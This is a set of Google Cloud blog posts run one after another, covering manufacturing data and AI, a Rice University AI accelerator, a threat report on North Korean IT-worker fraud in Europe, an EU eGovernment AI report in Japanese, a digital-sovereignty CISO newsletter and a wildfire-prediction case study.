2. Resilience is non-negotiable
The pandemic exposed the fragility of global supply chains and disruptions continue to be commonplace. According to Accenture, supply chain disruptions cause businesses to miss out on $1.6 trillion in revenue growth opportunities each year, on average. To increase resilience and address disruption isn’t just a logistical challenge it requires a proactive approach. Manufacturers need to enhance visibility, improve forecasting, and leverage technology to identify and mitigate potential risks.
Multimodal AI can help improve supply chain management. By analyzing data from various sources like sensor data, visual inspections, and logistics tracking, AI can provide a holistic view of the supply chain, enabling proactive responses to disruptions.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3e97ccaaeb20>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
3. Bridging a digital skills gap
The manufacturing industry is facing a severe shortage of skilled workers, exacerbated by the rapid pace of technological advancements. Deloitte and The Manufacturing Institute found that there could be as many as 3.8 million net new employees needed in manufacturing between 2024 and 2033, and that around half of these jobs (1.9 million) could remain unfilled if the talent void is not solved. This talent gap poses a significant challenge to productivity, innovation, and long-term growth. Addressing the talent gap in manufacturing requires a multi-pronged approach. Manufacturers must invest in upskilling and reskilling their existing workforce, while also attracting and retaining top talent through competitive benefits and engaging work environments.
To empower existing workers and accelerate training, multimodal assistive search tools can provide instant access to relevant information through various formats like text, audio, and video. These tools enable users to verbally query for information, receive spoken answers or summaries of manuals, listen to step-by-step instructions, and even facilitate the creation of video-based training materials – rapidly enabling learning.
4. Sustainability is a business mandate (Enhanced by AI Agents)
Sustainability is now deeply intertwined with business success and 88% of manufacturers recognizing the critical role of technology in going green.. Consumers are increasingly demanding sustainable products and practices, and regulators are imposing stricter environmental standards. Manufacturers must embrace sustainable practices across their entire value chain, from sourcing raw materials to minimizing waste and reducing their carbon footprint.
To manage complex sustainability reporting, AI agents can automate data collection, and analysis.To help with compliance, agents can verify the materials and ingredients used against sources, track proper disclosures, and confirm adherence to mandated disclaimers.
5. Unlocking holistic insights
Many manufacturing organizations operate with siloed data residing in disparate departments and systems. The data is also incredibly diverse, often including Operational Technology (OT) data from the shop floor, Information Technology (IT) data from enterprise systems, and Engineering Technology (ET) data from design and simulation tools. This fragmentation, coupled with the differences in data formats, structures, and real-time requirements across these domains, can hinder manufacturers’ ability to gain a holistic view of their operations. This leads to missed opportunities for optimization and inefficient decision-making.Breaking down these silos and establishing interoperability across OT, IT, and ET data is critical for unlocking the full potential of AI and driving truly informed business decisions.
As manufacturers integrate more data, the risk increases and AI-powered security becomes essential. AI can detect anomalies, facilitate threat intelligence including prevention, detection, monitoring and remediation – and ensure data integrity across interconnected systems, safeguarding sensitive information.
How does MDE and Cortex Framework help manufacturers address these 5 challenges?
Manufacturing Data Engine provides a unified data and AI layer that facilitates the analysis of multimodal data for better supply chain visibility, supports assistive search for bridging talent gaps, and enables AI agents to optimize sustainability initiatives. Furthermore, MDE helps contextualize various types of data, including OT, IT, and ET, allowing for richer insights and more effective AI applications. Critically, MDE aids in establishing a digital thread by connecting data back to its source, ensuring traceability and a holistic understanding of the product lifecycle. Moreover, Cortex Framework allows for the seamless integration of enterprise data with manufacturing data, enabling use cases like forecasting financial impact with machine data and optimizing production schedules based on demand signals.
We’re excited to showcase this latest release at two major industry events:
Hannover Messe: Visit our booth to see live demonstrations of the new features and learn how MDE can help you drive industrial transformation.
Google Cloud Next: Join us at the Industry Showcase (Manufacturing) Booth to explore the latest advancements in our data and AI platforms, including Manufacturing Data Engine.
Breaking down the data silos between IT (business data) and OT (industrial data) is critical for manufacturers seeking to harness the power of AI for competitive advantage. This week, at Hannover Messe, Google Cloud is excited to announce the latest release of its signature solution, Manufacturing Data Engine, to help manufacturers unlock the full potential of their operational data and drive AI transformation on-and-off the factory floor faster.
In 2024, we delivered a number of enhancements to MDE to strengthen the integration between OT and IT data, and with initial technical foundation extensions for MDE to integrate with Cortex Framework. At the same time, the adoption of Cortex Framework, which helps customers accelerate business insights into their enterprise IT data, has grown beyond the traditional enterprise IT data sources from ERP, CRM, and ESG, to marketing and social media, and more.
Building on our progress, this latest MDE release completes our IT/OT integration journey and introduces powerful new features: Development Mode, historical metadata linking, Configuration Packages, to enable better data grounding of IT and OT data to drive faster AI outcomes. These advancements empower manufacturers to unlock deeper insights and achieve more with their data.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3dff362f6c70>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
Accelerating innovation with Development Mode: With Development Mode, manufacturers have more flexibility to delete configuration objects, which is particularly valuable in development and proof-of-concept (PoC) environments. This helps accelerate the innovation cycle by making it easier and less time-consuming to experiment with new data models.
Ingest time-shifted data with historical metadata linking: This feature uses event-time to map the correct metadata instances, which are extended with a “valid from” timestamp. This means manufacturers can load historical data at a later date and MDE will insert it into the right place in the timeline, ensuring accurate historical data representation of your data. This is helpful for manufacturers who need to load data out of order, and in turn makes it easier to analyze historical trends and patterns to optimize their operations.
Streamlining IT and OT with Configuration Packages: MDE Configuration Packages provide a powerful new way to merge factory floor data with your core enterprise systems by creating and packaging industry and use case-specific MDE configurations. Manufacturers can bridge the IT and OT gap, packaging their OT data from MDE in predictable schemas for integration within Cortex Framework alongside supply chain, marketing, finance, and sustainability data.
These powerful new features along with faster IT and OT data integration unlock a spectrum of transformative use-cases.
For example, manufacturers can visualize optimizing production schedules based on real-time demand signals from their marketing campaigns, or accurately forecast financial impacts by correlating machine performance with ERP financial data. They can enhance sustainability initiatives by analyzing energy consumption alongside production output.
Combine multimodal data from your factory with enterprise IT data for a holistic view of your operations
By contextualizing multimodal data from machines, sensors, and cameras with data from Cortex Framework, manufacturers gain a truly holistic view of their operations.
Unlocking new Gen AI use cases
Previously, manufacturers could combine OT data using MDE with Google AI services for things like faster issue resolution with ML-based anomaly detection, or flexible and scalable visual quality control.
With this release, we’re enabling even more possibilities for manufacturing intelligence by making it easier and faster to unify IT and OT data to use in grounding large language models (LLMs) for generative AI applications. Conversational Analytics lets you chat with your BigQuery data, Sheets, Looker Explores/Reports/Dashboards and more for generative analytics and insights. Imagine getting current open support cases from your customer support system, spotting an outlier, and being able to immediately ask for and trace the outlier part through to the production quality data from your factory floor to isolate the issue.
Use Conversational Analytics to get immediate, data-driven insights
By building on this latest release of MDE with Cortex Framework, in combination with Google Cloud’s AI capabilities, manufacturers can receive immediate, data-driven insights, empowering you to make smarter, faster decisions across your entire value chain.
Partner ecosystem: Driving customer success with Deloitte
We’re proud to work with a robust ecosystem of partners who are instrumental in helping our customers achieve their digital transformation goals in manufacturing.
We’re especially excited to announce that Deloitte has launched a packaged services offering for our latest MDE release, enabling customers to quickly leverage the new capabilities with services delivered by a trusted partner. Contact Deloitte to learn more, or visit their demo stand at the Google Cloud booth at Hannover Messe and at Google Cloud Next to understand how they can help you with your initiatives.
Looking ahead
Our latest release of MDE represents a significant milestone in our journey to empower manufacturers with the tools they need to thrive in the digital age. We’re committed to continuous innovation and look forward to partnering with you on your industrial transformation journey.
Stay tuned for more updates and insights from Google Cloud.
We’re excited to showcase this latest release at two major industry events:
Hannover Messe: Visit our booth to see live demonstrations of new features and learn how MDE can help you drive industrial transformation.
Google Cloud Next: Join us at the Industry Showcase (Manufacturing) Booth to explore the latest advancements in our data and AI platforms, including Manufacturing Data Engine, or join one of our Manufacturing-focused sessions.
Rice University and Google Public Sector are partnering to launch the Rice AI Venture Accelerator (RAVA), designed to drive early-stage AI innovation and commercialization. This collaboration enables RAVA to connect AI-first startups with leading enterprises in healthcare, energy, transportation, and the public sector, aiming to drive AI-powered solutions to pressing industry challenges.
In an increasingly AI-driven world, the RAVA team acknowledges the critical need to balance speed of innovation and security. RAVA aims to create an ecosystem where founders can be both bold and responsible by bringing the simplicity, security, and intelligence of Google Cloud’s information approach to their startup.
Through this collaboration, direct access to Google Cloud’s AI experts, cloud computing, and sandbox services. Google Cloud will provide a full-stack AI, data, and security sandbox environment that will enable AI-first startups to rapidly prototype, scale faster, and save money.
The AI-optimized sandbox will include the following capabilities:
AI
Automated provisioning and management of environments tailored to industries including healthcare, energy, transportation and public sector. These environments will include connections to Google Cloud’s differentiated data sets like Alphafold and access to fully managed services like Health Data Engine, Google Earth Engine and Google Maps.
AI-infused accelerators, including Graphical Process Units (GPUs) and Google Cloud’s custom-design Arm-based processors (Axion) and Tensor Processing Units (TPUs) for analytics, information retrieval, and ML training
Multi-agentic AI framework and a unified development platform via Google Vertex AI Platform which includes Agent Builder and 160+ first-party (Gemini, Imagen 3), third-party, and open (Gemma) foundation models.
Data & Analytics
Modernized API management via Apigee to build, manage, and secure APIs—for any use case, environment, or scale.
Business and embedded analytics via Looker to explore and share insights in real time as well as access to hundreds of cross-industry public datasets via BigQuery
Google Public Sector will also provide dedicated training to RAVA startups and supporting teams to maximize their AI literacy and industry adoption.
“We are thrilled to announce the launch of the Rice AI Venture Accelerator in partnership with Google Public Sector,” Rice President Reginald DesRoches said. “This collaboration builds on Rice’s decades-long history of innovation and aligns perfectly with our mission to transform breakthrough research into real-world impact. Through RAVA, we are creating an ecosystem where industry leaders can access the next generation of AI-driven solutions.”
“Google Public Sector is excited to partner with RAVA to build an AI Innovation Hub that will enable startups to accelerate innovation and solve the most complex challenges across different industries. Through our collaboration, we are hoping to help startups to do more with less and to effectively adapt to rapidly changing environments,” said Reymund Dumlao, Google Public Sector Director of State & Local Government and Education
Since our September 2024 reportoutlining the Democratic People’s Republic of Korea (DPRK) IT worker threat, the scope and scale of their operations has continued to expand. These individuals pose as legitimate remote workers to infiltrate companies and generate revenue for the regime. This places organizations that hire DPRK IT workers at risk of espionage, data theft, and disruption.
In collaboration with partners, Google Threat Intelligence Group (GTIG) has identified an increase of active operations in Europe, confirming the threat’s expansion beyond the United States. This growth is coupled with evolving tactics, such as intensified extortion campaigns and the move to conduct operations within corporate virtualized infrastructure.
On The March: IT Workers Expand Globally with a Focus on Europe
DPRK IT workers’ activity across multiple countries now establishes them as a global threat. While the United States remains a key target, over the past months, DPRK IT workers have encountered challenges in seeking and maintaining employment in the country. This is likely due to increased awareness of the threat through public reporting, United States Department of Justice indictments, and right-to-work verification challenges. These factors have instigated a global expansion of IT worker operations, with a notable focus on Europe.
Figure 1: List of countries impacted by DPRK IT Workers
IT Worker Activity in Europe
In late 2024, one DPRK IT worker operated at least 12 personas across Europe and the United States. The IT Worker actively sought employment with multiple organizations within Europe, particularly those within the defense industrial base and government sectors. This individual demonstrated a pattern of providing fabricated references, building a rapport with job recruiters, and utilizing additional personas they controlled to vouch for their credibility.
Separately, additional investigations uncovered other IT worker personas seeking employment in Germany and Portugal, alongside login credentials for user accounts of European job websites and human capital management platforms.
GTIG has also observed a diverse portfolio of projects in the United Kingdom undertaken by DPRK IT workers. These projects included web development, bot development, content management system (CMS) development, and blockchain technology, indicating a broad range of technical expertise, spanning traditional web development to advanced blockchain and AI applications.
Specific projects identified include:
Development of a Nodexa token hosting plan platform utilizing Next.js, React, CosmosSDK, and Golang, as well as the creation of a job marketplace using Next.js, Tailwind CSS, MongoDB, and Node.js.
Further blockchain-related projects involved Solana and Anchor/Rust smart contract development, and a blockchain job marketplace built using the MERN stack and Solana.
Contributions to existing websites by adding pages using Next.js and Tailwind CSS,
Development of an AI web application leveraging Electron, Next.js, artificial intelligence, and blockchain technologies.
In their efforts to secure these positions, DPRK IT workers employed deceptive tactics, falsely claiming nationalities from a diverse set of countries, including Italy, Japan, Malaysia, Singapore, Ukraine, the United States, and Vietnam. The identities utilized were a combination of real and fabricated personas.
IT workers in Europe were recruited through various online platforms, including Upwork, Telegram, and Freelancer. Payment for their services was facilitated through cryptocurrency, the TransferWise service, and Payoneer, highlighting the use of methods that obfuscate the origin and destination of funds.
Facilitators Support European Operations
The facilitators used by IT workers to help them get jobs, defeat identity verification, and receive funds fraudulently have also been found in Europe. One incident involved a DPRK IT worker utilizing facilitators located in both the United States and the United Kingdom. Notably, a corporate laptop, ostensibly intended for use in New York, was found to be operational in London, indicating a complex logistical chain.
An investigation into infrastructure utilized by a suspected facilitator also highlighted heightened interest in Europe. Resources discovered contained fabricated personas, including resumes listing degrees from Belgrade University in Serbia and residences in Slovakia, as well as instructions for navigating European job sites. Additionally, contact information for a broker specializing in false passports was discovered, indicating a coordinated effort to acquire fraudulent identification documents. One document provided specific guidance on seeking employment in Serbia, including the use of a Serbian time zone during communications.
Extortion Heating Up
Alongside global expansion, DPRK IT workers are also evolving their tactics. Based on data from multiple sources, GTIG assesses that since late October 2024, IT workers have increased the volume of extortion attempts and gone after larger organizations.
In these incidents, recently fired IT workers threatened to release their former employers’ sensitive data or to provide it to a competitor. This data included proprietary data and source code for internal projects.
The increase in extortion campaigns coincided with heightened United States law enforcement actions against DPRK IT workers, including disruptions and indictments. This suggests a potential link, where pressure on these workers may be driving them to adopt more aggressive measures to maintain their revenue stream.
Previously, workers terminated from their places of employment might attempt to provide references for their other personas so that they could be rehired by the company. It is possible that the workers suspected they were terminated due to discovery of their true identities, which would preclude attempts to be rehired.
The Virtual Workspace: BYOD Brings IT Worker Risks
To avoid distributing corporate laptops, some companies operate a bring your own device (BYOD) policy, allowing employees to access company systems through virtual machines. Unlike corporate laptops that can be monitored, personal devices operating under a BYOD policy may lack traditional security and logging tools, making it difficult to track activities and identify potential threats. This absence of conventional security measures means that typical evidence trails linked to IT workers, such as those derived from corporate laptop shipping addresses and endpoint software inventories, are unavailable. All of this increases the risk of undetected malicious activity.
GTIG believes that IT workers have identified BYOD environments as potentially ripe for their schemes, and in January 2025, IT workers are now conducting operations against their employers in these scenarios.
Conclusion
Global expansion, extortion tactics, and the utilization of virtualized infrastructure all highlight the adaptable strategies employed by DPRK IT workers. In response to heightened awareness of the threat within the United States, they’ve established a global ecosystem of fraudulent personas to enhance operational agility. Coupled with the discovery of facilitators in the UK, this suggests the rapid formation of a global infrastructure and support network that empowers their continued operations.
※この投稿は米国時間 2025 年 3 月 26 日に、Google Cloud blog に投稿されたものの抄訳です。
Implement Consulting Group が今回発表した新しいレポート「The AI opportunity for eGovernment in the EU」によると、生成 AI を導入することで、生産性の向上を通じて EU の行政機関に 1,000 億ユーロの機会がもたらされ、EU の市民と企業が大きなメリットを得られる可能性があります。
AI は、単なる技術進歩として導入を検討するものではなく、EU 全域の電子政府の進化に「不可欠」な要素であり、生産性の向上がその鍵となります。
ルーティン タスクの自動化や文書処理の改善といった低リスクの用途は、生成 AI の潜在的な価値の 15~20% を占めており、最優先に対応すべきものです。これらのユースケースを通して、政府はガバナンス フレームワークを強化しながら、制御された低リスクの環境で AI を活用できます。
生成 AI で EU 機関の生産性を 12% 向上できる可能性生成 AI は、立法、行政、司法、財務の複雑な業務を担当する職員を支援することで、EU 機関内の生産性を 12% 向上させる可能性があります。生成 AI を導入すると、EU 機関に勤務する 60,000 人の従業員の意思決定を強化し、効率を高め、リソースをより適切に配分できるようになります。
管理プロセスに生成 AI を統合することで、承認のボトルネックを減らし、コンプライアンスの手順を加速させ、より明確でアクセスしやすい規制の枠組みを実現できます。
チャットボットや翻訳サービスなどの AI を活用したツールには、多様なニーズや言語的背景を持つ市民が政府サービスを利用しやすくなるという利点もあります。
AI の広範な導入公共部門向けの AI インフラストラクチャには、効率的なスケーラビリティ、新たなテクノロジーやマルチクラウド運用への適応性、データ プライバシーとサイバーセキュリティを備えた堅牢なセキュリティ、共同作業のための相互運用性が必要です。最先端の AI のためにオンプレミスのスーパーコンピュータを導入すると、高額な費用がかかるだけでなく、非効率的でもあります。このため、行政機関に AI を広範に導入する際は、安全かつ堅牢なクラウド インフラストラクチャを利用します。この場合、専門のサプライヤーに依頼することが、最も費用対効果が高くスケーラブルなソリューションとなります。
EU がリーダーシップを発揮する機会このレポートでは、EU 政府が AI を活用したデジタル政府革命を主導する大きな機会があることを強調しています。AI の導入に関して積極的かつ戦略的なアプローチを採用することで、EU は公共部門における AI のグローバルな倫理基準と規制基準を定めることができます。また、イノベーションの促進、人材の発掘、利用しやすくレスポンシブなサービスを通じた市民のエンゲージメントの強化も実現できます。さらに、AI を活用して公共部門の効率を改善し、新たな経済成長の機会を創出することで、経済競争力を高めることもできます。
政府は AI の導入を促進するため今すぐ行動を起こすべきAI 導入の環境を整えるうえで、政府は重要な役割を果たします。AI の可能性を最大限に引き出すには、行政機関が、必要なインフラストラクチャの構築、データ品質の確保、AI 関連スキルの育成、規制の明確化に注力する必要があります。
クラウド インフラストラクチャや、法令を遵守した部門横断的なデータ共有手法などに関して不確実な点があり、AI の導入が遅れると、EU にもたらされる可能性全体が大幅に損なわれるおそれがあります。さらに、スキル不足や研究開発の不十分さなどの障壁も、導入を遅らせる要因となり得ます。生成 AI の導入開始が 5 年遅れると、達成できる可能性がある GDP が 3,000 億~4000 億ユーロ減少すると考えられています。
行政機関に特化した、安全かつスケーラブルな AI インフラストラクチャが、効果的な導入の鍵となります。質の高いデータ ガバナンスによって AI による改善が可能になる一方、ルールの簡素化と調和のとれた GDPR の導入によって責任ある AI の導入が促進されるでしょう。同様に重要なポイントは、公務員が日常業務で AI を効果的に活用するための知識と専門知識を身につけることです。
AI はもはや、遠い将来に導入を目指すものではなく、欧州連合の電子政府の未来を支える中心的な柱となっています。積極的な AI 導入はすでに始まっており、EU によるこの重要な変革への取り組みは世界中から注目を集めています。
Welcome to the second Cloud CISO Perspectives for March 2025. Today, Archana Ramamoorthy, senior director of product management, Google Cloud, explains our approach to digital sovereignty and we believe strongly in meeting this vital customer need.
As with all Cloud CISO Perspectives, the contents of this newsletter are posted to the Google Cloud blog. If you’re reading this on the website and you’d like to receive the email version, you can subscribe here.
–Phil Venables, VP, TI Security & CISO, Google Cloud
aside_block
<ListValue: [StructValue([(‘title’, ‘Get vital board insights with Google Cloud’), (‘body’, <wagtail.rich_text.RichText object at 0x3e5c49ed5910>), (‘btn_text’, ‘Visit the hub’), (‘href’, ‘https://cloud.google.com/solutions/security/board-of-directors?utm_source=cloud_sfdc&utm_medium=email&utm_campaign=FY24-Q2-global-PROD941-physicalevent-er-CEG_Boardroom_Summit&utm_content=-&utm_term=-‘), (‘image’, <GAEImage: GCAT-replacement-logo-A>)])]>
How digital sovereignty builds better borders for the future
By Archana Ramamoorthy, senior director of product management, Google Cloud
The future of data security, trust, and controls are hot topics for boards of directors, executives, CISOs, politicians, and regulators. While the challenges we face are important, they are not insurmountable, and Google Cloud has been developing technology and solutions from our earliest days to help customers address their security, compliance and privacy needs.
Archana Ramamoorthy, senior director, product management, Google Cloud
Our commitment to security, trust, and control intersect prominently in our approach to digital sovereignty, which can help organizations who require stronger controls over data and digital infrastructure. We have embarked on a mult-year journey to help address these concerns. Since 2020, we have been building a digital future on Europe’s terms, to help prepare our customers and partners for the time when trust and control take center stage.
European customers and policymakers have identified several key requirements to help achieve digital sovereignty. These include: Control over access to their data, including what type of personnel can access the data and from which region; inspectability of changes to cloud infrastructure and services that impact access to or the security of their data; and survivability of their highly sensitive workloads.
The specific aspects of digital sovereignty that matter to an organization can vary, and these needs can shift over time. It’s crucial for CISOs and board members to regularly assess their current strategies and collaborate with leaders across the organization.
We address these and other requirements in our pillars of sovereignty: data, operational, and software sovereignty.
Google Cloud’s approach: Three pillars of digital sovereignty.
An organization may have requirements in some or all these areas, and their needs may change and evolve over time. At Google Cloud, we believe that a provider’s solutions need to address the depth and breadth of sovereign requirements, allowing customers the flexibility and choice from a wide range of technical controls to meet their needs. These solutions must work with the applications and technologies that power organizations today.
Google Sovereign Cloud solutions help enable every organization to meet their data, operational, and software sovereignty needs so they can accelerate their digital transformation. Our customers can meet sovereignty requirements whether they choose to use Google’s public cloud services, Google Distributed Cloud, or Google Workspace. Customers can deploy workloads with local controls and assurances provided by trusted local partners, and foster an ecosystem of independent software vendors (ISVs) specializing in sovereign-ready solutions.
Assured Workloads offers European customers the ability to deploy a sovereign data boundary and control where their data is stored and processed. Google Workspace customers can similarly use Local Data Storage to maintain their data in a country of their choice. In addition, Sovereign Controls, whether managed by Google or by a partner, give customers unprecedented visibility and control over data access, as well as the ability to deny access requests for any reason.
Since 2021 Google Cloud has partnered with Thales to build a first-of-its-kind Trusted Cloud. This Trusted Cloud will be fully operated by S3NS, a standalone entity under French law, to meet the SecNumCloud standard and enable French and European customers to meet rigorous security and compliance goals. Next, we are actively working towards a Trusted Cloud offering in Germany to meet the needs of our German and European customers.
Google Distributed Cloud (GDC) provides a fully air-gapped sovereign data and operational boundary that never requires connectivity to an external network. GDC is deployed and operated by the customer or a trusted partner, and offers a rich set of AI and database services. GDC is designed to maximise survivability and ensure business continuity in the face of external events.
Putting digital sovereignty into action
The specific aspects of digital sovereignty that matter to an organization can vary, and these needs can shift over time. It’s crucial for CISOs and board members to regularly assess their current strategies and collaborate with leaders across the organization. Focusing on collaboration can help ensure that digital sovereignty strategies remain relevant, effective, and aligned with the organization’s evolving goals.
Discuss the following three steps to implement a digital sovereignty strategy with your CISO, CIO, CTO, legal and regulatory affairs teams, and the business.
Ground the strategy by clarifying why digital sovereignty matters to your organization, and consider such factors as:
Legal and regulatory compliance: Avoid fines, sanctions, and legal challenges.
Data protection and privacy: Safeguard sensitive company and customer data.
Business continuity: Minimize disruptions due to external events.
Reputation management: Demonstrate commitment to ethical data practices.
Competitive advantage: Position your company as a trustworthy data steward.
Analyze the operational impacts of implementing a digital sovereignty strategy based on the most important factors. These may include:
Data storage: Assess where your data resides, and if it complies with applicable laws.
Cloud service providers: Evaluate their compliance with sovereignty regulations and offerings to help operationalize sovereignty strategies.
Data transfers: Ensure secure and compliant cross-border data flows.
Contractual agreements: Incorporate clauses into contracts with partners and vendors outlining how access to data is controlled.
Implement your organization’s digital sovereignty strategies with an eye towards the board’s strategic activities, including:
Risk assessment: Identify and quantify sovereignty risks.
Compliance strategy: Develop a roadmap for compliance with regulations with sovereignty requirements.
Technology investments: Evaluate solutions that support data sovereignty, such as local data centers and encryption.
Partnerships and alliances: Collaborate with experts to navigate complex regulatory environments with sovereign requirements.
Communication: Keep stakeholders informed about your company’s data sovereignty efforts.
Customer trust and control starts with cybersecurity, and Google Cloud is secure by design and by default. Our sovereign offerings enable customers to use our AI infrastructure, while helping to maintain control over data residency, access, and operational aspects.
As we work with customers, we will continue to engage with governments to ensure that Google Sovereign Cloud continues to meet their needs and requirements. To learn more about our approach to digital sovereignty, and our range of unique, comprehensive sovereign and multicloud solutions, please check out the Google Sovereign Cloud website.
Sections of this article appeared in the fifth edition of our Perspectives on Security for the Board report. You can read thefull report here.
aside_block
<ListValue: [StructValue([(‘title’, ‘Join the Google Cloud CISO Community’), (‘body’, <wagtail.rich_text.RichText object at 0x3e5c49ed5700>), (‘btn_text’, ‘Learn more’), (‘href’, ‘https://rsvp.withgoogle.com/events/ciso-community-interest?utm_source=cgc-blog&utm_medium=blog&utm_campaign=2024-cloud-ciso-newsletter-events-ref&utm_content=-&utm_term=-‘), (‘image’, <GAEImage: GCAT-replacement-logo-A>)])]>
In case you missed it
Here are the latest updates, products, services, and resources from our security teams so far this month:
Get ready for a unique, immersive security experience at Next ‘25: Here’s why Google Cloud Next is shaping up to be a must-attend event for security experts and the security-curious alike. Read more.
How we do security programs at global scale: Royal Hansen shares insights into Google’s internal security culture, and how Google uses Secure by Design to grow security at enterprise scale. Read more.
Our 4-6-3 rule for strengthening security ties to business: The desire to quickly transform a business can push leaders to neglect security and resilience, but prioritizing security can unlock value. Here’s how. Read more.
How creative thinking can help secure critical infrastructure: Creative thinking starts with an encouraging workplace. Here’s how to change OT workplace culture, and three use cases that show it in action. Read more.
Secure backups with threat detection and remediation: To further support your security needs, we’re adding more integration between Backup and DR, Security Command Center, and Google Security Operations. Read more.
Mastering secure AI on Google Cloud: A practical guide for enterprises: We want customers to be successful as they develop and deploy AI, and that means using risk mitigation and proactive security measures. Here’s how to get started. Read more.
Google Cloud, Atlético de Madrid expand cybersecurity partnership: We’re proud to become Atlético de Madrid’s official cybersecurity partner, reinforcing our shared commitment to innovation and resilience in sports technology. Read more.
What AI can learn from the cloud’s early days: Just like early cloud pioneers who neglected to build a solid foundation, many organizations are now rushing into AI without a secure blueprint. Here’s how AI can avoid cloud’s mistakes. Read more.
Please visit the Google Cloud blog for more security stories published this month.
Session stealing in seconds with browser-in-the-middle attack techniques: BitM attacks offer a streamlined approach for attackers to quickly compromise sessions across web applications. With sophisticated social engineering tactics now able to effectively bypass multi-factor authentication, organizations must implement robust defenses, including hardware-based MFA, client certificates, and FIDO2. Read more.
Please visit the Google Cloud blog for more threat intelligence stories published this month.
Now hear this: Podcasts from Google Cloud
Ephemeral clouds, lasting security: What’s important for cloud security investigations? Is there really a difference between Cloud Detection and Response (CDR) and Cloud Investigation and Response Automation (CIRA)? James Campbell and Chris Doman of Cado join hosts Anton Chuvakin and Tim Peacock to discuss the future of cloud investigations. Listen here.
Threat modeling at Google, from basics to AI-powered magic: Meador Inge, Google Cloud security engineer, pulls back the curtain with Anton and Tim on how Google does threat modeling. Listen here.
To have our Cloud CISO Perspectives post delivered twice a month to your inbox, sign up for our newsletter. We’ll be back in February with more security-related updates from Google Cloud.
Imagine a world where we could outsmart wildfires, predict their chaotic spread, and shield communities from their devastating reach. That’s the vision Rocio Frej Vitalle and the Improving Aviation team had when they created WindTL, a tool driven by the raw power of AI and data.
Turning this vision into a practical reality meant building a service-model tool that could handle massive data streams and complex AI models in order to deliver real-time wildfire predictions to first responders. Google Cloud provided the essential foundation for the Improving Aviation team to build the SkyTL core architecture to WindTL’s platform, leveraging Google Cloud’s scalable infrastructure for data processing and model deployment.
Scaling the new tool demanded both technical expertise and a strong strategic partnership. Google Cloud engineers consulted on AI, streaming data, and runtime architectures, while experts from Google for Startups provided leadership guidance. This support enabled Improving Aviation to rapidly enhance WindTL’s capabilities and significantly amplify their impact to the fire and rescue industry.
With Improving Aviation’s wildfire software, WindTL, end users now have science-based AI-decision making powers, obtaining a much more accurate understanding of the probability and severity of wildfire ignition risks before and during a disaster. WindTL isn’t just another fire model; it’s a lifeline, designed to combat the silent killer of wildfire destruction: ember spread, responsible for a staggering 90% of structural losses [1] built with Google Cloud technology.
*WindTL, developed by Improving Aviation, is a decision support tool designed for real-time situational awareness, pre-fire risk assessment, and predictive wildfire modeling. WindTL leverages AI-powered models to deliver accurate wildfire spread, ember behavior, and ignition risk predictions, equipping field personnel with the intelligence needed to make proactive, data-driven decisions.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud developer tools’), (‘body’, <wagtail.rich_text.RichText object at 0x3e5c46ed5fa0>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
Scalable wildfire response: WindTL’s Google Cloud architecture & framework explained
WindTL operates as a fully integrated product within SkyTL, leveraging a modular, cloud-based architecture that ensures real-time situational awareness and predictive analytics. At its core, WindTL’s architecture consists of these components:
Data ingestion pipeline: Collecting data from satellites, drones, IoT sensors, and weather stations enabling real-time wildfire condition analysis.
Collection of historical data (Gemini): Engineered a comprehensive historical wildfire dataset by extracting and structuring disparate publicly available online data sources which directly fueled the machine learning model’s predictive behavior.
AI-driven modeling (Vertex AI): Utilizing physics-informed neural networks (PINNs) and custom machine learning models deployed on Google Cloud’s Vertex AI for ember risk and fire behavior prediction.
BigQuery data analytics: Leveraging BigQuery for scalable storage and real-time analysis of massive datasets, providing actionable insights for decision-makers.
Interactive web UI (SkyTL integration): A user-friendly, web-based interface, integrated with Improving Aviation’s SkyTL backend, for visualizing fire spread models, high-risk zones, and supporting informed suppression strategy development.
Cloud-native scalability (GKE): Employing Google Kubernetes Engine (GKE) for rapid scaling and low-latency responses, ensuring concurrent access for thousands of users and adaptability to large-scale wildfire events.
The following architectural diagram illustrates WindTL’s seamless integration into emergency response workflows, providing firefighters, emergency responders and insurance providers with reliable, real-time intelligence for critical decision-making.
WindTL’s cloud-based architecture; designed for scalability and rapid response
Google Cloud helped WindTL revolutionize wildfire prediction
Since 2024, the Improving Aviation team has partnered closely with Google Cloud engineers to scale and enhance the WindTL tool. Leveraging Google’s AI and cloud technologies, Improving Aviation has achieved the following:
Accelerated model execution: Utilizing Google Kubernetes Engine (GKE) and optimized cloud computing, Improving Aviation reduced AI model run times over local execution for wildfire simulations.
Scalable data processing: By implementing Google Cloud’s BigQuery and Vertex AI, Improving Aviation enabled the ingestion and analysis of massive, real-time wildfire datasets, providing critical up-to-the-minute intelligence.
Improved prediction accuracy: Integration of Google’s physics-informed neural networks (PINNs) significantly enhanced ember spread prediction accuracy, leading to more precise risk assessments and resource allocation.
WindTL spotlight: driving innovation featured in Google Cloud video
Improving Aviation’s revolutionary AI is showcased in the short video Predicting wildfire behavior with WindTL & Google AI. Released on Google Cloud Tech’s YouTube channel, the video dives deep into how WindTL leverages Google AI to predict wildfire behavior, breaking down the science of ember spread and demonstrating how real-time decision support is saving lives and catastrophic property losses.
Improving Aviation’s Tampa headquarters was the site of a Google Cloud team onsite visit, where they documented WindTL’s core engineering processes and captured the behind-the-scenes magic that powers WindTL. You can read more about Improving Aviation’s experience in Transforming Wildfire Management: Google Cloud Highlights WindTL’s Innovation.
Lessons learned: accelerating AI development with Google Cloud partnership
The partnership between Improving Aviation and Google Cloud yielded more than just technical enhancements—it provided critical insights applicable to developers building AI-powered systems:
Scalability as a core requirement: Designing for real-time applications, particularly in critical domains like wildfire management, demands inherently scalable architectures. This necessitates leveraging cloud-native services for dynamic resource allocation and efficient data processing.
Collaborative model: Direct collaboration with Google’s AI and Outbound Strategy & Enable Cloud engineering teams enabled Improving Aviation engineers to implement iterative model optimization, resulting in significantly improved predictive accuracy. Shared knowledge, sprints, and access to specialized tooling accelerated our development cycles.
